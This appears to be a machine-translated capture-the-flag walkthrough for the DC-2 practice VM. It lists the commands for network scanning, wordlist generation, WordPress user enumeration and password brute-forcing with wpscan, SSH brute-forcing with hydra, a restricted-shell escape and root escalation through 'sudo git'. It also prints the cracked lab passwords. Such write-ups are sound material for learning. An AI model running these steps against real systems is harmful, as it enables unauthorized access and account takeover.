Target address ：http://www.five86.com/downloads/DC-2.zip

Network mode ：NAT

Catalog

The host found

Domain name resolution

cewl 

 wpscan Blasting users

 rbash Bypass , obtain flag3

  Use git Raise the right

  summary

The host found

nmap 192.168.194.1/24 -sS
nmap 192.168.194.159 -A -p 1-65535

  Open the http and ssh service , visit 80 port

Domain name resolution

Domain name resolution error , stay /etc/hosts Add , Use the following data ip visit

192.168.194.159    dc-2

 

Found to be wordpress Website and flag1

cewl 

 cewl :Linux  Dictionary generation tool cewl

cewl http://dc-2 -w passwd.txt
 

Use dirb obtain

 wpscan Blasting users

Three user names ：admin,tom,jerry

wpscan --ignore-main-redirect --url http://192.168.194.159 --enumerate u --force
 

  Use wpscan Blast ,

wpscan --ignore-main-redirect --url http://dc-2/ -U user1.txt -P passwd.txt -t 30

Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient
 

  Log in to tom and jerry Background view of , Find out jerry There are flag2

Use the user name and password dictionary above , adopt hydra Blast ssh The login password ,-s Is the port

hydra -L user1.txt -P passwd.txt ssh://192.168.194.159 -s 7744 -t 40

  Connect

 ssh [email protected] -p 7744

 rbash Bypass , obtain flag3

BASH_CMDS[a]=/bin/sh;a   notes ： hold /bin/bash to a Variable `
export PATH=$PATH:/bin/     notes ： take /bin As PATH Environment variable export
export PATH=$PATH:/usr/bin   notes ： take /usr/bin As PATH Environment variable export

  Use what you got before jerry Try the password , feasible , obtain flag4

  Use git Raise the right

sudo git -p --help 

!/bin/bash

  summary

• Domain name restrictions
•  cewl :Linux  Dictionary generation tool cewl
• wpscan Blasting users
• Bypass rbash
• git Raise the right